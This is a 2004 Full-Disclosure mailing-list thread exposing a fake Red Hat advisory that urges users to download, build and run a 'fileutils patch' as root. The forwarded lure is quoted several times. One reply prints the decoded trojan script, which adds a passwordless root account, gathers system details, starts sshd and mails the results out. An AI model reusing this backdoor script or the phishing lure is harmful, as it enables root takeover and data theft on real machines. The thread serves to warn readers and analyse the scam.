[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-24 Thread Hugo van der Kooij
-BEGIN PGP SIGNED MESSAGE-

Be advised.

The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.

Message was send from 'University of Texas at Arlington'.

I am sure none of you should be fooled by such a message but other might
be.

And while it lasts you may want to get the file for your own educational
purposes.

Hugo.
- -- Forwarded message --
Date: Sun, 24 Oct 2004 17:22:20 -0500
From: RedHat Security Team <[EMAIL PROTECTED]>
To: *
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"


[logo_rh_home.png]

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you must
make by following these steps:

 *  First download the patch from the Security RedHat mirror: wget
www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
 *  Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
 *  cd fileutils-1.0.6.patch
 *  make
 *  ./inst

Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright (C) 2004 Red Hat, Inc. All rights reserved.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
fcdKycT5D9E=
=/nEk
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-25 Thread Feher Tamas
Hello,

Read these:

http://www.redhat.com/security/
http://www.f-secure.com/weblog/#0323

>The message below is currently going around on internet.
>Being unsinged was the fist obvious issue.

Do you really expect a singing security alert from RedHat? I
think the all singing, all dancing security bulletins are a
M$ specialty.

Regards: Tamas Feher.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-24 Thread Harry Hoffman
haha, that's pretty funny. If they were going to do something like that 
it should have at least been in a rpm format.

I'm hoping that this doesn't need to be said but if neither
"yum check-update || up2date -l" report anything then chances are there
are no "Official Fedora Updates"
--Harry

Hugo van der Kooij wrote:
-BEGIN PGP SIGNED MESSAGE-
Be advised.
The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.
Message was send from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but other might
be.
And while it lasts you may want to get the file for your own educational
purposes.
Hugo.
- -- Forwarded message --
Date: Sun, 24 Oct 2004 17:22:20 -0500
From: RedHat Security Team <[EMAIL PROTECTED]>
To: *
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
[logo_rh_home.png]
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you must
make by following these steps:
 *  First download the patch from the Security RedHat mirror: wget
www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
 *  Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
 *  cd fileutils-1.0.6.patch
 *  make
 *  ./inst
Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright (C) 2004 Red Hat, Inc. All rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)
iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
fcdKycT5D9E=
=/nEk
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-24 Thread Andrew Farmer
Hugo van der Kooij wrote:
Be advised.
The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.
Message was send from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but other 
might
be.
And while it lasts you may want to get the file for your own 
educational
purposes.

I did a quickie analysis of the program (which is basically just 
distributed as source!).

Strings are encrypted with arcfour; however, as the keys are included 
too, decrypting them is no problem.

pswd[] is an initialization vector for arcfour.
shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$@"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR
opts[], text[], and chk2[] are encrypted with some (apparently 
constant) data retrieved by statting /bin/sh.

To cut to the chase, the whole thing ends up clearing the screen and 
running the following shell script:

#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
echo "This patch must be applied as \"root\", and you are: 
\"`whoami`\""
exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please 
wait ..."
sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
 echo "Inca un root frate belea: " >> /tmp/mama
 adduser -g 0 -u 0 -o bash >> /tmp/mama
 passwd -d bash >> /tmp/mama
 ifconfig >> /tmp/mama
 uname -a >> /tmp/mama
 uptime >> /tmp/mama
 sshd >> /tmp/mama
 echo "user bash stii tu" >> /tmp/mama
 cat /tmp/mama | mail -s "Inca o roata" [EMAIL PROTECTED] >> 
/dev/null
 rm -rf /tmp/mama
 mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi

bla()
{
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 3
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 4
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo "#"
  sleep 1
}
echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these 
files."
sleep 1


PGP.sig
Description: This is a digitally signed message part


Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-25 Thread Vincent Archer
On Sun, Oct 24, 2004 at 07:51:09PM -0400, Harry Hoffman wrote:
> haha, that's pretty funny. If they were going to do something like that 
> it should have at least been in a rpm format.

Considering you can put an executable script inside, if I remember right.

> I'm hoping that this doesn't need to be said but if neither
> "yum check-update || up2date -l" report anything then chances are there
> are no "Official Fedora Updates"
> 
> --Harry
> 
> 
> 
> Hugo van der Kooij wrote:
> >-BEGIN PGP SIGNED MESSAGE-
> >
> >Be advised.
> >
> >The message below is currently going around on internet. Being unsinged
> >was the fist obvious issue. Not pointing to RPM updates, being in a
> >different format and such were among the other reasong to suspect it.
> >
> >Message was send from 'University of Texas at Arlington'.
> >
> >I am sure none of you should be fooled by such a message but other might
> >be.
> >
> >And while it lasts you may want to get the file for your own educational
> >purposes.
> >
> >Hugo.
> >- -- Forwarded message --
> >Date: Sun, 24 Oct 2004 17:22:20 -0500
> >From: RedHat Security Team <[EMAIL PROTECTED]>
> >To: *
> >Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> >
> >
> >[logo_rh_home.png]
> >
> >Original issue date: October 20, 2004
> >Last revised: October 20, 2004
> >Source: RedHat
> >
> >A complete revision history is at the end of this file.
> >
> >Dear RedHat user,
> >
> >Redhat found a vulnerability in fileutils (ls and mkdir), that could
> >allow a remote attacker to execute arbitrary code with root privileges.
> >Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
> >RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
> >known that *BSD and Solaris platforms are NOT affected.
> >
> >The RedHat Security Team strongly advises you to immediately apply the
> >fileutils-1.0.6 patch. This is a critical-critical update that you must
> >make by following these steps:
> >
> > *  First download the patch from the Security RedHat mirror: wget
> >www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
> > *  Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> > *  cd fileutils-1.0.6.patch
> > *  make
> > *  ./inst
> >
> >Again, please apply this patch as soon as possible or you risk your
> >system and others` to be compromised.
> >
> >Thank you for your prompt attention to this serious matter,
> >
> >RedHat Security Team.
> >
> >Copyright (C) 2004 Red Hat, Inc. All rights reserved.
> >
> >
> >-BEGIN PGP SIGNATURE-
> >Version: GnuPG v1.2.3 (GNU/Linux)
> >
> >iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
> >OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
> >H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
> >fcdKycT5D9E=
> >=/nEk
> >-END PGP SIGNATURE-
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-26 Thread Stephen Jimson

The k-otik folks have an analysis of the bad things
that might happen if you follow the instructions in
the fake RedHat advisory that was reported in
yesterday's diary:

http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt



the source code is also there

Steph


--- Brett Campbell <[EMAIL PROTECTED]> wrote:

> On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew
> Farmer wrote:
>  
> > I did a quickie analysis of the program (which is
> basically just 
> > distributed as source!).
> 
> 
> when did you get a hold of the tarball? they must've
> yanked the record
> for www.fedora-redhat.com ... it can't be resolved
> in any way.
> 
> pretty interesting (and pathetic) anyways, nice
> detective work.
> 
> -- 
> [ Brett R. Campbell ]
>  -> Configuration Management / Systems
> Administration
>  -> Collaborative Agent Design Research Center
>  -> California Polytechnic State University, SLO, CA
> 



__
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [security] Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-26 Thread Brett Campbell
On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote:
 
> I did a quickie analysis of the program (which is basically just 
> distributed as source!).


when did you get a hold of the tarball? they must've yanked the record
for www.fedora-redhat.com ... it can't be resolved in any way.

pretty interesting (and pathetic) anyways, nice detective work.

-- 
[ Brett R. Campbell ]
 -> Configuration Management / Systems Administration
 -> Collaborative Agent Design Research Center
 -> California Polytechnic State University, SLO, CA
 http://www.cadrc.calpoly.edu/frameset_content/content_about_us.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html